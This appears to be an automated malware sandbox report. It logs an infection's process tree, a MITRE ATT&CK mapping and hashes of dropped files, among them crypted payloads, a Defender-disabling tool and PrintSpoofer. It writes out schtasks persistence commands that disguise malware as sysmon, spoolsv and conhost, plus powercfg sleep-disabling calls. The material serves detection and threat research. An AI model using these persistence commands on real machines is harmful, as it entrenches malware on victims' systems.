C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 6 /tr "'C:\odt\sysmon.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5664

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\odt\sysmon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2788

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 11 /tr "'C:\odt\sysmon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2752

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Mail\spoolsv.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2176

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files\Windows Mail\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5004

C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe
C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe
1⤵
PID:5136
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  PID:4928
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  PID:5324
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  PID:1568
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  PID:3376
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:3208
- C:\Windows\system32\svchost.exe
  svchost.exe
  2⤵
  PID:4676

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Mail\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1280

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Portable Devices\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3872

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3264

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Portable Devices\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1696

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\Program Files\dotnet\swidtag\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2908

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\dotnet\swidtag\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2324

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Program Files\dotnet\swidtag\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5948

C:\Users\Admin\AppData\Roaming\OneDrive.exe
C:\Users\Admin\AppData\Roaming\OneDrive.exe
1⤵
PID:2512

C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe
C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe
1⤵
PID:4976

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scripting

T1064

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Scripting

T1064

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\VideoLAN\VLC\plugins\spu\TrustedInstaller.exe

Filesize
828KB

MD5
6b3e49b6d32aca957297d8c71e698737

SHA1
73294c085a65af8528ea636ee15132020ba38fe5

SHA256
fef594135e18a708750abad999febeba51d6efe9d6d3073f02a1acb12731eed8

SHA512
151ce51cbcce1ee4cb8b145b02124efc1cb93ef9320da60321cd179d8544930c7f2aa9af4cd4ddd0a71dc32ef5b0069fd8e6bb5e76359d3286d526ccf7e5510b

Download Submit
C:\ProgramData\HJDAKFBF

Filesize
92KB

MD5
d8258cfea30050e289acf9aa882159f2

SHA1
26acf382025e2880308c3cb82ee11b935f52d6fa

SHA256
97f3a97af8aad5da47509b3b5639b85c82f5b67fb34193ef409c9bb84c2e334b

SHA512
caa184c63653b9b8be5b76833be8caf40d8a6804cc26b329d955e5b59e5cf75c0e9e654f5e4fef9fdb76536f43fe3d9a4017a3446f0610d6df61f3737f44a74a

Download Submit
C:\ProgramData\MediaDevicePicker 3.0.194.66\MediaDevicePicker 3.0.194.66.exe

Filesize
3.2MB

MD5
de879b52a630d7c7e276b7dc2cd86627

SHA1
1695a629a150069bd404d169da2e77a969a5c93a

SHA256
65779eb008227048b891c954c359314d54c887c4b1f47a2add887870749c4fd2

SHA512
fcb9a26137f795931fe01cc70344c748b0ef64345ecf9af9f00421649436ea885ebb193dc2110a4b8847fc913cc148e0ec260e176e703cf53c79c9a3bb4539ed

Download Submit
C:\ProgramData\iolo\logs\WSComm.log

Filesize
286B

MD5
0d9811bab4cd56bbbfd168cde7e99f9b

SHA1
d1f7531dc3c5d3471236b56defdf7abef35f469d

SHA256
0c4e796e1245472f15903bcad384e1556c681aafd6b5242b1c86eee9224c0cf0

SHA512
e294b9b906dcd31f2b791a832684de4fec77c5740d946bb400607ed13978811c420cfbba16b6c915c7a99e5a66fac238b332df7ddd481dd97c0874f68ecd7fab

Download Submit
C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
4KB

MD5
bdb25c22d14ec917e30faf353826c5de

SHA1
6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

SHA256
e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

SHA512
b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
3d086a433708053f9bf9523e1d87a4e8

SHA1
b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

SHA256
6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

SHA512
931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
124edf3ad57549a6e475f3bc4e6cfe51

SHA1
80f5187eeebb4a304e9caa0ce66fcd78c113d634

SHA256
638c51e173ca6b3469494a7e2e0b656021a761f77b4a83f3e430e82e7b9af675

SHA512
b6c1a9051feeffad54ba1092fd799d34a9578368d7e66b31780fe478c1def0eb4094dce2879003f7389f2f9d86b94a3ef3975e78092a604597841c9b8db120ee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
419d7945d3a021758f5c6650b953b7e4

SHA1
a7b71eec35b65b663b69fc3dd227089b1784adbf

SHA256
1936de477985b359d0136e3bfbe78ac6e034804e06db06e01951ac36b95a1a45

SHA512
750fa3b22749032a7cbb8124f97b1a5eed2aec7f18f488c9f284d4d562ca8e1b7d06900e17bf6aacbf6a99e9618bc8b56b878bbb2352e2a76f2f330fb39203a5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c697637a9b17f577fccd7e83a5495810

SHA1
04e6054584786b88994b0e0a871562227fe2a435

SHA256
54992c76969f661b605042ebdc73912dbc42e3f88aa6ffecb7191a598fc17164

SHA512
66f85a03889786d2c910880bf32e9ea380740b665f11828d06acb03b6f63fb11be1d70e67acb3bc2118f2c35824919458ce7c85f6843c72a3e5ca44fadc0b3c0

Download Submit
C:\Users\Admin\AppData\Local\RuntimeBroker2.exe

Filesize
837KB

MD5
3ecf5cab8e919a5bb0c047bd80e5dfee

SHA1
4abdb1574cec441b1efdea63f1a30b3318bad32e

SHA256
c69fa2eab697e81ab16220fb7cff13f1feed69bb84a9df039920501eb699c7bc

SHA512
3b871383921202e1a06c55ad1774b7403be754fc1e567260867f14e4f2ccc31a9bf6deb9ac22837277cea395f31db7213155318a96beb249e171ec186d25c15f

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpCE9A.tmp

Filesize
2KB

MD5
1420d30f964eac2c85b2ccfe968eebce

SHA1
bdf9a6876578a3e38079c4f8cf5d6c79687ad750

SHA256
f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9

SHA512
6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_c4pmalpd.fbg.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\1111.exe

Filesize
2.8MB

MD5
e670bdc7c82eee75a6d3ada6a7c9134e

SHA1
b0f0bab6f6e92bc86e86fd7bff93c257a4235859

SHA256
a5cf4844df86abc9222fe436dbc0726e09383a61f4708cdc1a3e8a89cc3540fb

SHA512
7384550bb19ccc11243b79d3bfc9c3f25dce84de64891e7f7eb078b246bfedcd26a958a019a3a7b4ecf5ee1c4e8c8d44790f5c958a58266e5676f3a8e58f4643

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\1234.exe

Filesize
1.3MB

MD5
5e13199a94cf8664e5bfbe2f68d4738e

SHA1
8cfaa21f68226ae775615f033507b5756f5ccacc

SHA256
71b320a5d9456acc43494213dcd1f4ae8b7f6e27a15ac80cb42df5f19f692ec5

SHA512
b7b682717cd49b9fff9885c85f1421050613559308aa7160dee7ce493d5bff126c8157727d8f88fdfd602092203c64ab0dbff718b7ce7af9f9f2ad8375d703b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\123p.exe

Filesize
10.7MB

MD5
b091c4848287be6601d720997394d453

SHA1
9180e34175e1f4644d5fa63227d665b2be15c75b

SHA256
d0b06ca6ece3fef6671fa8acd3d560a9400891abcd10f5cedcfe7bd1e6050dfe

SHA512
a3b3663fd343389aee2cbf76f426401d436992b2b56cea3b60e9c2e385510fa874fa45b2ac75703074f0303934c4223eaee1983851374a2e753fd0302042cc5a

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\555.exe

Filesize
2.7MB

MD5
7162024dc024bb3311ee1cf81f37a791

SHA1
be03705f33a8205f90330814f525e2e53dfb5871

SHA256
3e39efae22fcda501f858229af27be129f178c85723d4477ef9be2f80b61a8fd

SHA512
94652b8b770fcdd70ee5059b56ce84aee50c46901b6311e2a602cdb4d97b15abd0148ba4e55f225f722d125bf9c3969185bcefaf07f3911a4347d9a0ca8d2d38

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\Adobe_update.exe

Filesize
334KB

MD5
cd77e00b04bc4ad0ccb96a7819c9dda8

SHA1
f41f6ccb7a4117f8b646940caf501c2d8904e336

SHA256
3a14bf440814f53b7260a37dcc2a422f6a3859cfada26a143496be81e41f0706

SHA512
9f06c96fa6c8cd4b7adc50b7915b4cbb4e171f1180ecf0e56d31890dade54983bf1c014badb6f26ffd708dfd2a566659a2deefa0bc05280b2914c521575281a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\BrawlB0t.exe

Filesize
65KB

MD5
3a71554c4a1b0665bbe63c19e85b5182

SHA1
9d90887ff8b7b160ffc7b764de8ee813db880a89

SHA256
9340551164eb763cd63db1f251b535dea497edfcf1eb46febcb642b1369f8595

SHA512
49c869db9a74c8054a477396c205685f41d4fe79ed1bb9088c1d528d7df8dfd1e251ec016939a0207484e6fd2f3338afad06b4f242c7fcb5d16d2293db16e772

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\Document.exe

Filesize
492KB

MD5
0eec3b50636ae6d37613e6a2c7617191

SHA1
630d5e3b88215d88432db42d2bd295c6d4b55ee8

SHA256
32dc8827ff96982401777cd7feb77798660450a3e8960855577e8ace837f8b05

SHA512
9a2088cce7ed6da8e2f13f2486925e7565b50a6c527363f0da19ff28910314fb9723496dfe3ddf0a977d1b0c8ff1661f0ae6bc3789332534ad0bea3cbafbdc12

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\ISetup2.exe

Filesize
462KB

MD5
a4ec935e1c6f0d69191c6e44a2f33001

SHA1
c3d3ef65661d505af383787aadc0a7f1ad53fe1b

SHA256
23a544dceb68c1b854df1f6aa380028a1d6f419a3513f0c76077d2b14e802ceb

SHA512
88bac506e7baa443066113b3d84022ef0499b5612cb3e22d430caff504f41d425df107d34f888976295ad9f7a8aa5882f203946fa44410928cb1f435c286a0ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\ISetup8.exe

Filesize
462KB

MD5
553b8789445fe3a82085008d6cd15847

SHA1
36c529bd96fe5442f051857649ccb6e1ccfd31d9

SHA256
22b832e0020ffff96eb6cb913cc37e0a1ec80b3a2f4025667098232323f89f09

SHA512
81670f3a6d4c41f2cc7d590e29f0c50f5ec8b42d9d852dfd579f87396358878374f48ae25b6915e7fde2758aa57ab6118aa8bd12571d8445d193b177cd0ae788

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\IjerkOff.exe

Filesize
1.1MB

MD5
6e6f8bc0dbceec859f9baaff0ebe2811

SHA1
495b4434e34bbf6c432718ee6fac880f16be49a0

SHA256
7574d2c9903d02681c8190816aa30a76d8874f03148539eacd6af126dc4cba8e

SHA512
aab1bba5a4fc395f2d378bfc2bad098ce4efbeadacea47f650e16afd99373d518fd2cf9f8c30422cd34939d04d2e05ac9fc5ee8b48d6f5bc8f7cbb19d1bfeac7

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\Ledger-Live.exe

Filesize
106KB

MD5
fe380780b5c35bd6d54541791151c2be

SHA1
7fe3a583cf91474c733f85cebf3c857682e269e1

SHA256
b64a84d1f88e4e78464a1901c1cb5bbd5f00bb73203d719e64e072157a087b53

SHA512
ba05ba8aa13c4bc1cf98fbf6c08b021e8b19354098e0397fc8e1e5d3dcce367c1063203f24e50d0973193f6535681d0a43486e5dade5d112853b7a2fe8739b6c

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\Opera_109.0.5097.38_Autoupdate_x64.exe

Filesize
14.1MB

MD5
00cff17049654ef186ce3151dd387620

SHA1
c86dba058e0741363cc8559c47e1c353a1f7f8b6

SHA256
5d851071db9b02082a6cf76e2037c452f54ddb136bb7bb36274a3b71f6e775a0

SHA512
54dfc12326d5a28f752c6f97dc23bb3f34914d8924bc40ba9f011f116b21c59843436829b9d7b9a3d49f51ec2659176d2e3c1f9115a3bca217978fb51f61c430

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\PrintSpoofer.exe

Filesize
611KB

MD5
dbdcbacbc74b139d914747690ebe0e1c

SHA1
a43a5232d84e4f40e2103aa43ab4a98ce2495369

SHA256
54fbd0b6c760f3f0892bd7fabeb6bbad9444a013a024e8a22813c0c0a77d6c18

SHA512
74cfc6270d88c13ba030dfd5c3312920cd1bf0f3fa61ceb27d6a9ec64c1855f72a0f9f5eb14ab781eb7a1dab31effc5c49c1ac1cab395da143ba883e6d46a2d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\Retailer_prog.exe

Filesize
5.5MB

MD5
fa88d1c7d5a92118cd8c607b1330cb57

SHA1
24b3f6d3409e42baeebd7cd08cc27ce1b6c8d2e9

SHA256
538f359fbe8a044fcec6a9962a39922608bc416c4fd6b3e15a2a659a689e9f56

SHA512
54d53cfc8c1455e11b694bf3dbb972aba7f79113da8250f4c996fa11017b93f677a1aafeb9cda774608b00de2154f7ad2d27e2625844043e98418f4bdf3d62c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\Tester.exe

Filesize
267KB

MD5
0803c1aec008e75859877844cfa81492

SHA1
16924d5802ddf76a2096fcfade0ce06d4c0670bd

SHA256
d5ab98bd209db0ed18272fe616ea4b8be34fd13d36116d25793fa7aa6f8b33e3

SHA512
9001e77da2562652ae51bdb3b8b9bfe686d0ed0c4eb8d338b20b7c4eb6eb8e90a4fae01d8212b1908037d5ff456e982500e4907686c38e5c33e969d55ba914d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\alexxxxxxxx.exe

Filesize
1.7MB

MD5
85a15f080b09acace350ab30460c8996

SHA1
3fc515e60e4cfa5b3321f04a96c7fb463e4b9d02

SHA256
3a2006bc835a8ffe91b9ee9206f630b3172f42e090f4e8d90be620e540f5ef6b

SHA512
ade5e3531dfa1a01e6c2a69deb2962cbf619e766da3d6e8e3453f70ff55ccbcbe21381c7b97a53d67e1ca88975f4409b1a42a759e18f806171d29e4c3f250e9f

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\cccc.exe

Filesize
45KB

MD5
e93bd9e06b8b09c7f697bff19e1da942

SHA1
a5efe9e9115a9d7ca92c3169af71546e254d062e

SHA256
de74d9f4418390f531456319015719dbcee1d5692b4b19800e7a492218d0badc

SHA512
6e43d19adf860cfdfc2a711ca72dd84f3376e514473077106f99f1aa0f509e6d5765d3499a52c13599674d33366f35fd3158a9c02ebdc045fb637e81986e0b08

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\crypt.exe

Filesize
1.4MB

MD5
d1ba7baf72077fb7d02f44c9f9b8f7ae

SHA1
0350cd5db239fb09ec4f30bed172551e410a76d4

SHA256
ba78571683994ac10261134dab60e6e98dd417a417ff32aac59fe461e4e3ccd9

SHA512
f77a5df3ac6b9abe21c815a2ae0ea977a5b68cfe764dc2d081704766519b9c75b2943ab50145e8896b64e4a855ba99ea907b6d28ac8047975d19f68a48c87eae

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\crypted6077866846MVYQY.exe

Filesize
524KB

MD5
c8edf453ed433cefb2696bb859e0f782

SHA1
e34cf939d6c5a34c7bedfd885249bb7fb15336e5

SHA256
0c5c2b10c3161ad9452c25d4a10e082ec94f0eb39b583c03ab3534a5e45649a0

SHA512
61d0ba50f9678d6614e4d8ab8b06d759891979e0debfda88246871ee110a07c16ceeed4e7baec475b4b63de851bc5d62c69c5ae41674ffc207b94515f6ab197c

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\crypted_097f1784.exe

Filesize
2.2MB

MD5
c58613667ad928b9e369db25b740ec9a

SHA1
16755f756eea39eb5f012ee3daf41a9474c9d488

SHA256
ae5c73ae04c51465b7fc1dd3238dc80b959fb68146cc9572c52a6d48bc47cfe9

SHA512
bd9e86daba2935314ce5f2c4d9c8ba9c9819d778c2b575e2293081638bdffe1eeff98a02fde98d9f818fbc40751c88eab4ad75dc06ad3b4b4bdd4fa69c6264b7

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\crypted_33cb9091.exe

Filesize
2.3MB

MD5
6b822932c8d64c86f333d47f0eb9b203

SHA1
417e904b3ee027a7b45ce716fad31c2e1a3234db

SHA256
8dde9ae7bba0cf1cd94a37bb3a08b417e8948dc19e3b2a84117b1b500963e75c

SHA512
be7a04934acc0be68a03d6807de8c7d3215403ffe36a41d961e5dd5c7774eba5272c5c51ceade3049ea9466a6b890f698ca98a8ea445fe53b6f9c580dae111f8

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\crypted_69a30000.exe

Filesize
2.1MB

MD5
6d78e0311bb641bb7530f4ac48a6b5d0

SHA1
7d5ab1267ab49a746bc27fe86b8cc35cc7c3834e

SHA256
d6129031e25ad05a41f3e7da06b6a11d0d148133033fd865bad202a5165fb7c4

SHA512
fd6bb0939c088211163da6743870dad4efbb819c9f1aba4e5f1aba2c20532b2129133910be513c8de86ebbaf095d9feaa043b517e763d04b6133857bdd516667

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\disable-defender.exe

Filesize
294KB

MD5
10fc8b2915c43aa16b6a2e2b4529adc5

SHA1
0c15286457963eb86d61d83642870a3473ef38fe

SHA256
feb09cc39b1520d228e9e9274500b8c229016d6fc8018a2bf19aa9d3601492c5

SHA512
421631c06408c3be522953459228d2e1d45eeeafce29dba7746c8485a105b59c3a2c0d9e2ffc6d89126cd825ffd09ebe7eb82223a69d1f5caf441feb01e57897

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\diufhloadme.exe

Filesize
4.0MB

MD5
7010962cccd78789767380410a70b7c8

SHA1
f16ab407fc8f1ae8a954bc4ffb018447323d670b

SHA256
a91faefd1f8df889ca61c00266044044857c3da4984ccb34240bb75849bbd549

SHA512
67cce5cc3f5468df97ef28397ff01344b744a49e8e006d043622ea4b7730dd28be157855a5c2c671b34609fef62b4ef028feab1860030cfcc3431c6f68019aad

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\ghhjhjhsg.exe

Filesize
3.1MB

MD5
96f1a72749b4abe9f92e364dcd059dcb

SHA1
0480af36fc245942261e67428f4a8b8910d861fd

SHA256
996e8d1afc74090b75f936ca57b1570de64dff0dbcdbffa411f9f6ed814fc43f

SHA512
2386a5cebb41059293972879880142a087e18a1253c2d9c6b2eb28c5b1179410cf507a2dd6f3f166c99c1f780f15e6bcfbde228eac36616269158a04b9a06abe

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\i1gcbW1E.exe

Filesize
2.3MB

MD5
262a7eb58a01d1aab21b24292c181cd3

SHA1
535312b7048fb90be981e04ea759c5ad8aaf6eda

SHA256
107090a44888272297ecb7a715a9abca4bc17dafe6aa57505436722a5a9926a6

SHA512
358b34a792eadc739446283e42a352147aac1bad6d9a535eedabeb2427735b03e7977d25086cfa6b6e8e17df628e37d9a8cd584dd1a64d703e99a8f7af1a0e9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\june.exe

Filesize
3.8MB

MD5
75cc89837723da1ba163c6816b57c14e

SHA1
13d977529f3e1fc2252fc4c4e45faf1d0a7acac9

SHA256
2e065b8c9e67bd91fe466071b0984d3a3a8455e5dbf6a4468158d698149eb901

SHA512
dc0f5ac89911134c2e3b6337e5e45eaf6750b7122f135c11e1c57c8fe5f4d63c088e0747855b91c52c08839eecd88bbbf3ca54d9511f87a66fff999a65032a4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\medcallaboratory5.exe

Filesize
1.1MB

MD5
b915133065e8c357f8b37e28015088fe

SHA1
61286d2adea00cab97ade25d5221d7cfc36a580b

SHA256
3d79bf5d780b6770babf2f2cba5549a01992d4e77f797292e2f4a3ecd668379c

SHA512
69e6b492e3b36e55fd64608067d3b7329adb8890fd712e64b845943c5902ef1c983a388bfbfdeff646bc4ddab94c308b26de3b7c04ceea2bed52fc11acf759fc

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\mstsc.exe

Filesize
444KB

MD5
2d2ca48b8c09de0645b7fd0223c922f0

SHA1
de1f948065d612cd649564e466e362198f8ce3e6

SHA256
72e63f73ced48b29f196e48030215273a17f7827c310f2747321cbc1f388c206

SHA512
452f545f1f4d834a2cd92910fe5caa8c0f2ffdbaf2b3a0370c17f953422d37c13e10212219cae04fad93d07e81f370010a1951b29f2e83f78694ed68637d27bb

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\new.exe

Filesize
2.3MB

MD5
7651626126270e6709de81ee249b9211

SHA1
cc2ddef4bdb7e74fa27679bf4eca560827a30df7

SHA256
204d953d8b198c8871ec06b7922df9f2292ff8d97ac15cef73b73cf30b288daa

SHA512
384cb95e59af1c7b00549700641c42f994af4f539f867a08750fcf613531d44be9cb66d961b9f6a259c6aeeb56678fea3f0f6090896ded3d2201a21e063ceaad

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\new1.exe

Filesize
304KB

MD5
3ad1339dace3a7dc466e30b71ad5cad2

SHA1
7f7212a80c3d851bcf79232a7c7670c0fb79238b

SHA256
2465316c17ecf1dbe8e8ee2c6acded1a83ecc2777c017ea3c92d3e0a99a46147

SHA512
c0715c320741e86bfe3490a3d5f85f07f933ba84902166a28a83b18bfc8a7564d8b7d98f09eed8184bc846f4627864e9ebbe95e7265b8912a6c977aca4c757bb

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\svchost.exe

Filesize
66KB

MD5
00135a86ab829fc2d4678179d7a6e70f

SHA1
ef75c259865d7685d566b6e25b7a20d134952555

SHA256
0b8b21af69d0b465b7b8cd584bdba1f86d062bb0c7c51656f36a66fce8e9bd89

SHA512
011389f2bc93f45b36233238a32991823c3334e3259af98e7dd6cedb455fc930d5b603f51bb69e415ab24f285309eda0b272250f1ec82a21508de0681281a0ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\swiiii.exe

Filesize
158KB

MD5
586f7fecacd49adab650fae36e2db994

SHA1
35d9fb512a8161ce867812633f0a43b042f9a5e6

SHA256
cf88d499c83da613ad5ccd8805822901bdc3a12eb9b15804aeff8c53dc05fc4e

SHA512
a44a2c99d18509681505cf70a251baf2558030a8648d9c621acc72fafcb2f744e3ef664dfd0229baf7c78fb72e69f5d644c755ded4060dcafa7f711d70e94772

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\test2.exe

Filesize
2.7MB

MD5
5347852b24409aed42423f0118637f03

SHA1
6c7947428231ab857ee8c9dab7a7e62fdeed024b

SHA256
a2e678bb376d2dcec5b7d0abac428c87cd8ae75936e28c03cb4232ae97015131

SHA512
0a52f226be962eb8187f444657317d3e0385d9d47d507e6f1c028143f57153a7b8e34ef7b0c8732bb3b3d361da483a13264f511ca5c80cedda3bc439fe936991

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\toolspub1.exe

Filesize
321KB

MD5
a627e31131ad45411189aa4cec4bf311

SHA1
522fab7fc9cbbeba48896b0e57601475cd1667a1

SHA256
218a3454cf6cbe4920d9b750f20824c71fad284ceb2efb9ee7b90d732f1e0951

SHA512
e913d1338f0e1ae0419ab082ddc1f7e4584c361fc81e88f630aed9a19d9f654955e57b6210e825cecd245ca7d69bd42ee07657abbc1271706d2d86c9cef548f8

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\ttt01.exe

Filesize
421KB

MD5
9185b776b7a981d060b0bb0d7ffed201

SHA1
427982fb520c099e8d2e831ace18294ade871aff

SHA256
91a45c416324ed3a8c184e349214e7c82d6df0df4fe6d06f3c7818c0d322373b

SHA512
cb46ca0c3156dc7b177fdb73869e13b229cbab8918dbb4b61a854765313fc9526aa5d7b944aa4b9acb77717c5ffd8fe955ba4eb48d75e2528ec844bfcf4aa5e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\wininit.exe

Filesize
1.3MB

MD5
6b7314e8a04ad8436c3aff06f3918ea6

SHA1
61c5aca05c76396e70054b732d9afb7d4a5e293d

SHA256
c392c14304399e9ad13ede370375ecffa47f30245cb91a413a3fd1150721a929

SHA512
00b5c837c36cb44d5b1a7c724746daf85b4a1d4b89d55a2d81e8999ed34035baa84a8f9fc976704ec92afe52a316c09eb7b7d012d66d8d5eea284d31d5974baf

Download Submit
C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

Filesize
4KB

MD5
23c0eaaeef26daf2a09c63c74bb86a90

SHA1
63b84dafa983e8f6246b2f41c156ac57aa6f925f

SHA256
24377287adfab638907cb3090b27eef7b33f0539a0a46dac240517cba9b38576

SHA512
6fdff1af75f478ca601459d0527045e91800381a64aa972b5391057c69a1158194e41eeb1414993c24571dd7e7106cf40dca6af5cda521d8ab9fb36246e60dd5

Download Submit
C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

Filesize
1002B

MD5
72dc2ca84d1f4496a002df0cb2fa7bb0

SHA1
23374248d0fa2fc16d6957b03b05a2f5de36df5e

SHA256
a32a8fdba7f87286d8552c39303ebc860bb53c8d06c5ad91eaf0d8a74d9a4fd4

SHA512
